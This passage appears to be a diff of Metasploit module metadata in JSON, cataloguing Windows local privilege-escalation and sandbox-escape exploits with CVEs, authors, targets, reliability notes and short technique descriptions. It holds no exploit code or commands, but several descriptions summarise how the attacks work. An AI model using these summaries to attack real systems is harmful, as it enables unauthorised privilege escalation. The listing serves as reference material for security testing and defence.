"Reliability": [ - "repeatable-session" - ], - "Stability": [ - "service-resource-loss" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/linqpad_deserialization_persistence": { - "name": "LINQPad Deserialization Exploit", - "fullname": "exploit/windows/local/linqpad_deserialization_persistence", - "aliases": [], - "rank": 300, - "disclosure_date": "2024-12-03", - "type": "exploit", - "author": [ - "msutovsky-r7 ", - "James Williams" - ], - "description": "This module exploits a bug in LIQPad up to version 5.48.00. The bug is only exploitable in paid version of software. The core of a bug is cache file containing deserialized data, which attacker can overwrite with malicious payload. The data gets deserialized every time the app restarts.", - "references": [ - "URL-https://trustedsec.com/blog/discovering-a-deserialization-vulnerability-in-linqpad", - "CVE-2024-53326" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2025-05-06 08:43:57 +0000", - "path": "/modules/exploits/windows/local/linqpad_deserialization_persistence.rb", - "is_install_path": true, - "ref_name": "windows/local/linqpad_deserialization_persistence", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": [ - "shell", - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/microfocus_operations_privesc": { - "name": "Micro Focus Operations Bridge Manager / Reporter Local Privilege Escalation", - "fullname": "exploit/windows/local/microfocus_operations_privesc", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-10-28", - "type": "exploit", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module exploits an incorrectly permissioned folder in Micro Focus Operations Bridge\n Manager and Operations Bridge Reporter.\n An unprivileged user (such as Guest) can drop a JSP file in an exploded WAR directory and\n then access it without authentication by making a request to the OBM / OBR server.\n This will result in automatic code execution as SYSTEM. This module has been tested on\n OBM 2020.05 and OBR 10.40, but it should work out of the box on earlier versions too.\n Note that it is only exploitable on Windows installations.", - "references": [ - "URL-https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md", - "URL-https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md", - "CVE-2020-11858", - "CVE-2020-11855", - "ZDI-20-1326", - "ZDI-20-1217" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 443, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Micro Focus Operations Bridge Manager (Windows) <= 2020.05", - "Micro Focus Operations Bridge Reporter (Windows) <= 10.40" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/local/microfocus_operations_privesc.rb", - "is_install_path": true, - "ref_name": "windows/local/microfocus_operations_privesc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/mov_ss": { - "name": "Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability", - "fullname": "exploit/windows/local/mov_ss", - "aliases": [], - "rank": 600, - "disclosure_date": "2018-05-08", - "type": "exploit", - "author": [ - "Nick Peterson", - "Nemanja Mulasmajic", - "Can Bölük ", - "bwatters-r7" - ], - "description": "This module exploits a vulnerability in a statement in the system programming guide\n of the Intel 64 and IA-32 architectures software developer's manual being mishandled\n in various operating system kerneles, resulting in unexpected behavior for #DB\n excpetions that are deferred by MOV SS or POP SS.\n\n This module will upload the pre-compiled exploit and use it to execute the final\n payload in order to gain remote code execution.", - "references": [ - "CVE-2018-8897", - "EDB-44697", - "BID-104071", - "URL-https://github.com/can1357/CVE-2018-8897/", - "URL-https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/mov_ss.rb", - "is_install_path": true, - "ref_name": "windows/local/mov_ss", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/mqac_write": { - "name": "MQAC.sys Arbitrary Write Privilege Escalation", - "fullname": "exploit/windows/local/mqac_write", - "aliases": [], - "rank": 200, - "disclosure_date": "2014-07-22", - "type": "exploit", - "author": [ - "Matt Bergin", - "Spencer McIntyre" - ], - "description": "A vulnerability within the MQAC.sys module allows an attacker to\n overwrite an arbitrary location in kernel memory.\n\n This module will elevate itself to SYSTEM, then inject the payload\n into another SYSTEM process.", - "references": [ - "CVE-2014-4971", - "EDB-34112", - "URL-https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/mqac_write.rb", - "is_install_path": true, - "ref_name": "windows/local/mqac_write", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms10_015_kitrap0d": { - "name": "Windows SYSTEM Escalation via KiTrap0D", - "fullname": "exploit/windows/local/ms10_015_kitrap0d", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-01-19", - "type": "exploit", - "author": [ - "Tavis Ormandy", - "HD Moore", - "Pusscat", - "OJ Reeves" - ], - "description": "This module will create a new session with SYSTEM privileges via the\n KiTrap0D exploit by Tavis Ormandy. If the session in use is already\n elevated then the exploit will not run. The module relies on kitrap0d.x86.dll,\n and is not supported on x64 editions of Windows.", - "references": [ - "CVE-2010-0232", - "OSVDB-61854", - "MSB-MS10-015", - "EDB-11199", - "URL-https://seclists.org/fulldisclosure/2010/Jan/341" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2K SP4 - Windows 7 (x86)" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ms10_015_kitrap0d.rb", - "is_install_path": true, - "ref_name": "windows/local/ms10_015_kitrap0d", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms10_092_schelevator": { - "name": "Windows Escalate Task Scheduler XML Privilege Escalation", - "fullname": "exploit/windows/local/ms10_092_schelevator", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-09-13", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.\n When processing task files, the Windows Task Scheduler only uses a CRC32\n checksum to validate that the file has not been tampered with. Also, In a default\n configuration, normal users can read and write the task files that they have\n created. By modifying the task file and creating a CRC32 collision, an attacker\n can execute arbitrary commands with SYSTEM privileges.\n\n NOTE: Thanks to webDEViL for the information about disable/enable.", - "references": [ - "OSVDB-68518", - "CVE-2010-3338", - "BID-44357", - "MSB-MS10-092", - "EDB-15589" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Vista / 7 / 2008 (Dropper)", - "Windows Vista / 7 / 2008 (Command)" - ], - "mod_time": "2022-08-19 15:19:28 +0000", - "path": "/modules/exploits/windows/local/ms10_092_schelevator.rb", - "is_install_path": true, - "ref_name": "windows/local/ms10_092_schelevator", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms11_080_afdjoinleaf": { - "name": "MS11-080 AfdJoinLeaf Privilege Escalation", - "fullname": "exploit/windows/local/ms11_080_afdjoinleaf", - "aliases": [], - "rank": 200, - "disclosure_date": "2011-11-30", - "type": "exploit", - "author": [ - "Matteo Memelli", - "Spencer McIntyre" - ], - "description": "This module exploits a flaw in the AfdJoinLeaf function of the\n afd.sys driver to overwrite data in kernel space. An address\n within the HalDispatchTable is overwritten and when triggered\n with a call to NtQueryIntervalProfile will execute shellcode.\n\n This module will elevate itself to SYSTEM, then inject the payload\n into another SYSTEM process before restoring its own token to\n avoid causing system instability.", - "references": [ - "CVE-2011-2005", - "OSVDB-76232", - "EDB-18176", - "MSB-MS11-080", - "URL-http://www.offensive-security.com/vulndev/ms11-080-voyage-into-ring-zero/" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows XP SP2 / SP3", - "Windows Server 2003 SP2" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb", - "is_install_path": true, - "ref_name": "windows/local/ms11_080_afdjoinleaf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms13_005_hwnd_broadcast": { - "name": "MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation", - "fullname": "exploit/windows/local/ms13_005_hwnd_broadcast", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-11-27", - "type": "exploit", - "author": [ - "Tavis Ormandy", - "Axel Souchet", - "Ben Campbell " - ], - "description": "Due to a problem with isolating window broadcast messages in the Windows kernel,\n an attacker can broadcast commands from a lower Integrity Level process to a\n higher Integrity Level process, thereby effecting a privilege escalation. This\n issue affects Windows Vista, 7, 8, Server 2008, Server 2008 R2, Server 2012, and\n RT. Note that spawning a command prompt with the shortcut key combination Win+Shift+#\n does not work in Vista, so the attacker will have to check if the user is already\n running a command prompt and set SPAWN_PROMPT false.\n\n Three exploit techniques are available with this module. The WEB technique will\n execute a powershell encoded payload from a Web location. The FILE technique\n will drop an executable to the file system, set it to medium integrity and execute\n it. The TYPE technique will attempt to execute a powershell encoded payload directly\n from the command line, but may take some time to complete.", - "references": [ - "CVE-2013-0008", - "MSB-MS13-005", - "OSVDB-88966", - "URL-http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb", - "is_install_path": true, - "ref_name": "windows/local/ms13_005_hwnd_broadcast", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/ms13_053_schlamperei": { - "name": "Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)", - "fullname": "exploit/windows/local/ms13_053_schlamperei", - "aliases": [], - "rank": 200, - "disclosure_date": "2013-12-01", - "type": "exploit", - "author": [ - "Nils", - "Jon", - "Donato Capitella ", - "Ben Campbell " - ], - "description": "This module leverages a kernel pool overflow in Win32k which allows local privilege escalation.\n The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process).\n This allows any unprivileged process to freely migrate to winlogon.exe, achieving\n privilege escalation. This exploit was used in pwn2own 2013 by MWR to break out of chrome's sandbox.\n NOTE: when a meterpreter session started by this exploit exits, winlogin.exe is likely to crash.", - "references": [ - "CVE-2013-1300", - "MSB-MS13-053", - "URL-https://labs.mwrinfosecurity.com/blog/2013/09/06/mwr-labs-pwn2own-2013-write-up---kernel-exploit/" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 SP0/SP1" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ms13_053_schlamperei.rb", - "is_install_path": true, - "ref_name": "windows/local/ms13_053_schlamperei", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms13_081_track_popup_menu": { - "name": "Windows TrackPopupMenuEx Win32k NULL Page", - "fullname": "exploit/windows/local/ms13_081_track_popup_menu", - "aliases": [], - "rank": 200, - "disclosure_date": "2013-10-08", - "type": "exploit", - "author": [ - "Seth Gibson", - "Dan Zentner", - "Matias Soler", - "Spencer McIntyre" - ], - "description": "This module exploits a vulnerability in win32k.sys where under\n specific conditions TrackPopupMenuEx will pass a NULL pointer to\n the MNEndMenuState procedure. This module has been tested\n successfully on Windows 7 SP0 and Windows 7 SP1.", - "references": [ - "CVE-2013-3881", - "OSVDB-98212", - "BID-62830", - "MSB-MS13-081", - "URL-http://endgame.com/news/microsoft-win32k-null-page-vulnerability-technical-analysis.html", - "URL-http://immunityproducts.blogspot.com/2013/11/exploiting-cve-2013-3881-win32k-null.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 SP0/SP1" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ms13_081_track_popup_menu.rb", - "is_install_path": true, - "ref_name": "windows/local/ms13_081_track_popup_menu", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms13_097_ie_registry_symlink": { - "name": "MS13-097 Registry Symlink IE Sandbox Escape", - "fullname": "exploit/windows/local/ms13_097_ie_registry_symlink", - "aliases": [], - "rank": 500, - "disclosure_date": "2013-12-10", - "type": "exploit", - "author": [ - "James Forshaw", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in Internet Explorer Sandbox which allows to\n escape the Enhanced Protected Mode and execute code with Medium Integrity. The\n vulnerability exists in the IESetProtectedModeRegKeyOnly function from the ieframe.dll\n component, which can be abused to force medium integrity IE to user influenced keys.\n By using registry symlinks it's possible force IE to add a policy entry in the registry\n and finally bypass Enhanced Protected Mode.", - "references": [ - "CVE-2013-5045", - "MSB-MS13-097", - "BID-64115", - "URL-https://github.com/tyranid/IE11SandboxEscapes" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IE 8 - 11" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb", - "is_install_path": true, - "ref_name": "windows/local/ms13_097_ie_registry_symlink", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms14_009_ie_dfsvc": { - "name": "MS14-009 .NET Deployment Service IE Sandbox Escape", - "fullname": "exploit/windows/local/ms14_009_ie_dfsvc", - "aliases": [], - "rank": 500, - "disclosure_date": "2014-02-11", - "type": "exploit", - "author": [ - "James Forshaw", - "juan vazquez " - ], - "description": "This module abuses a process creation policy in Internet Explorer's sandbox, specifically\n in the .NET Deployment Service (dfsvc.exe), which allows the attacker to escape the\n Enhanced Protected Mode, and execute code with Medium Integrity.", - "references": [ - "CVE-2014-0257", - "MSB-MS14-009", - "BID-65417", - "URL-https://github.com/tyranid/IE11SandboxEscapes" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IE 8 - 11" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb", - "is_install_path": true, - "ref_name": "windows/local/ms14_009_ie_dfsvc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms14_058_track_popup_menu": { - "name": "Windows TrackPopupMenu Win32k NULL Pointer Dereference", - "fullname": "exploit/windows/local/ms14_058_track_popup_menu", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-10-14", - "type": "exploit", - "author": [ - "Unknown", - "juan vazquez ", - "Spencer McIntyre", - "OJ Reeves " - ], - "description": "This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability\n can be triggered through the use of TrackPopupMenu. Under special conditions, the\n NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary\n code execution. This module has been tested successfully on Windows XP SP3, Windows\n 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows\n 2008 R2 SP1 64 bits.", - "references": [ - "CVE-2014-4113", - "OSVDB-113167", - "BID-70364", - "MSB-MS14-058", - "URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ms14_058_track_popup_menu.rb", - "is_install_path": true, - "ref_name": "windows/local/ms14_058_track_popup_menu", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms14_070_tcpip_ioctl": { - "name": "MS14-070 Windows tcpip!SetAddrOptions NULL Pointer Dereference", - "fullname": "exploit/windows/local/ms14_070_tcpip_ioctl", - "aliases": [], - "rank": 200, - "disclosure_date": "2014-11-11", - "type": "exploit", - "author": [ - "Matt Bergin ", - "Jay Smith " - ], - "description": "A vulnerability within the Microsoft TCP/IP protocol driver tcpip.sys\n can allow a local attacker to trigger a NULL pointer dereference by using a\n specially crafted IOCTL. This flaw can be abused to elevate privileges to\n SYSTEM.", - "references": [ - "CVE-2014-4076", - "MSB-MS14-070", - "OSVDB-114532", - "URL-https://blog.korelogic.com/blog/2015/01/28/2k3_tcpip_setaddroptions_exploit_dev", - "URL-https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Server 2003 SP2" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb", - "is_install_path": true, - "ref_name": "windows/local/ms14_070_tcpip_ioctl", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms15_004_tswbproxy": { - "name": "MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape", - "fullname": "exploit/windows/local/ms15_004_tswbproxy", - "aliases": [], - "rank": 400, - "disclosure_date": "2015-01-13", - "type": "exploit", - "author": [ - "Unknown", - "Henry Li", - "juan vazquez " - ], - "description": "This module abuses a process creation policy in Internet Explorer's\n sandbox; specifically, Microsoft's RemoteApp and Desktop Connections runtime\n proxy, TSWbPrxy.exe. This vulnerability allows the attacker to escape the\n Protected Mode and execute code with Medium Integrity. At the moment, this\n module only bypass Protected Mode on Windows 7 SP1 and prior (32 bits). This\n module has been tested successfully on Windows 7 SP1 (32 bits) with IE 8 and IE\n 11.", - "references": [ - "CVE-2015-0016", - "MSB-MS15-004", - "URL-http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2015-0016-escaping-the-internet-explorer-sandbox/" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Protected Mode (Windows 7) / 32 bits" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ms15_004_tswbproxy.rb", - "is_install_path": true, - "ref_name": "windows/local/ms15_004_tswbproxy", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms15_051_client_copy_image": { - "name": "Windows ClientCopyImage Win32k Exploit", - "fullname": "exploit/windows/local/ms15_051_client_copy_image", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-05-12", - "type": "exploit", - "author": [ - "Unknown", - "hfirefox", - "OJ Reeves", - "Spencer McIntyre" - ], - "description": "This module exploits improper object handling in the win32k.sys kernel mode driver.\n This module has been tested on vulnerable builds of Windows 7 x64 and x86, and\n Windows 2008 R2 SP1 x64.", - "references": [ - "CVE-2015-1701", - "MSB-MS15-051", - "URL-https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html", - "URL-https://github.com/hfiref0x/CVE-2015-1701", - "URL-https://technet.microsoft.com/library/security/MS15-051" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ms15_051_client_copy_image.rb", - "is_install_path": true, - "ref_name": "windows/local/ms15_051_client_copy_image", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms15_078_atmfd_bof": { - "name": "MS15-078 Microsoft Windows Font Driver Buffer Overflow", - "fullname": "exploit/windows/local/ms15_078_atmfd_bof", - "aliases": [], - "rank": 0, - "disclosure_date": "2015-07-11", - "type": "exploit", - "author": [ - "Eugene Ching", - "Mateusz Jurczyk", - "Cedric Halbronn", - "juan vazquez " - ], - "description": "This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing\n a malformed font. The vulnerability was exploited by the hacking team and disclosed in\n the July data leak. This module has been tested successfully on vulnerable builds of\n Windows 8.1 x64.", - "references": [ - "CVE-2015-2426", - "CVE-2015-2433", - "MSB-MS15-078", - "MSB-MS15-080", - "URL-https://github.com/vlad902/hacking-team-windows-kernel-lpe", - "URL-https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/september/exploiting-cve-2015-2426-and-how-i-ported-it-to-a-recent-windows-8.1-64-bit/", - "URL-https://code.google.com/p/google-security-research/issues/detail?id=369", - "URL-https://code.google.com/p/google-security-research/issues/detail?id=480" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 8.1 x64" - ], - "mod_time": "2023-10-12 17:33:58 +0000", - "path": "/modules/exploits/windows/local/ms15_078_atmfd_bof.rb", - "is_install_path": true, - "ref_name": "windows/local/ms15_078_atmfd_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms16_014_wmi_recv_notif": { - "name": "Windows WMI Receive Notification Exploit", - "fullname": "exploit/windows/local/ms16_014_wmi_recv_notif", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-12-04", - "type": "exploit", - "author": [ - "smmrootkit", - "de7ec7ed", - "de7ec7ed" - ], - "description": "This module exploits an uninitialized stack variable in the WMI subsystem of ntoskrnl.\n This module has been tested on vulnerable builds of Windows 7 SP0 x64 and Windows 7 SP1 x64.", - "references": [ - "CVE-2016-0040", - "MSB-MS16-014", - "URL-https://github.com/de7ec7ed/CVE-2016-0040", - "URL-https://github.com/Rootkitsmm/cve-2016-0040", - "URL-https://technet.microsoft.com/en-us/library/security/ms16-014.aspx" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 SP0/SP1" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ms16_014_wmi_recv_notif.rb", - "is_install_path": true, - "ref_name": "windows/local/ms16_014_wmi_recv_notif", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms16_016_webdav": { - "name": "MS16-016 mrxdav.sys WebDav Local Privilege Escalation", - "fullname": "exploit/windows/local/ms16_016_webdav", - "aliases": [], - "rank": 600, - "disclosure_date": "2016-02-09", - "type": "exploit", - "author": [ - "Tamas Koczka", - "William Webb " - ], - "description": "This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn\n a process on the target system and elevate its privileges to NT AUTHORITY\\SYSTEM before executing\n the specified payload within the context of the elevated process.", - "references": [ - "CVE-2016-0051", - "MSB-MS16-016" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 SP1" - ], - "mod_time": "2021-07-21 12:35:47 +0000", - "path": "/modules/exploits/windows/local/ms16_016_webdav.rb", - "is_install_path": true, - "ref_name": "windows/local/ms16_016_webdav", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms16_032_secondary_logon_handle_privesc": { - "name": "MS16-032 Secondary Logon Handle Privilege Escalation", - "fullname": "exploit/windows/local/ms16_032_secondary_logon_handle_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-03-21", - "type": "exploit", - "author": [ - "James Forshaw", - "b33f", - "khr0x40sh" - ], - "description": "This module exploits the lack of sanitization of standard handles in Windows' Secondary\n Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12\n 32 and 64 bit. This module will only work against those versions of Windows with\n Powershell 2.0 or later and systems with two or more CPU cores.", - "references": [ - "MSB-MS16-032", - "CVE-2016-0099", - "URL-https://twitter.com/FuzzySec/status/723254004042612736", - "URL-https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb", - "is_install_path": true, - "ref_name": "windows/local/ms16_032_secondary_logon_handle_privesc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms16_075_reflection": { - "name": "Windows Net-NTLMv2 Reflection DCOM/RPC", - "fullname": "exploit/windows/local/ms16_075_reflection", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-01-16", - "type": "exploit", - "author": [ - "FoxGloveSec", - "breenmachine", - "Mumbai" - ], - "description": "Module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n to achieve a SYSTEM handle for elevation of privilege. Currently the module\n does not spawn as SYSTEM, however once achieving a shell, one can easily\n use incognito to impersonate the token.", - "references": [ - "MSB-MS16-075", - "CVE-2016-3225", - "URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/", - "URL-https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", - "URL-https://github.com/breenmachine/RottenPotatoNG" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows x86", - "Windows x64" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/ms16_075_reflection.rb", - "is_install_path": true, - "ref_name": "windows/local/ms16_075_reflection", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ms16_075_reflection_juicy": { - "name": "Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)", - "fullname": "exploit/windows/local/ms16_075_reflection_juicy", - "aliases": [], - "rank": 500, - "disclosure_date": "2016-01-16", - "type": "exploit", - "author": [ - "FoxGloveSec", - "breenmachine", - "decoder", - "ohpe", - "phra", - "lupman" - ], - "description": "This module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n to achieve a SYSTEM handle for elevation of privilege.\n It requires a CLSID string.\n Windows 10 after version 1803, (April 2018 update, build 17134) and all\n versions of Windows Server 2019 are not vulnerable.", - "references": [ - "MSB-MS16-075", - "CVE-2016-3225", - "URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/", - "URL-https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", - "URL-https://github.com/breenmachine/RottenPotatoNG", - "URL-https://decoder.cloud/2017/12/23/the-lonely-potato/", - "URL-https://ohpe.it/juicy-potato/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - 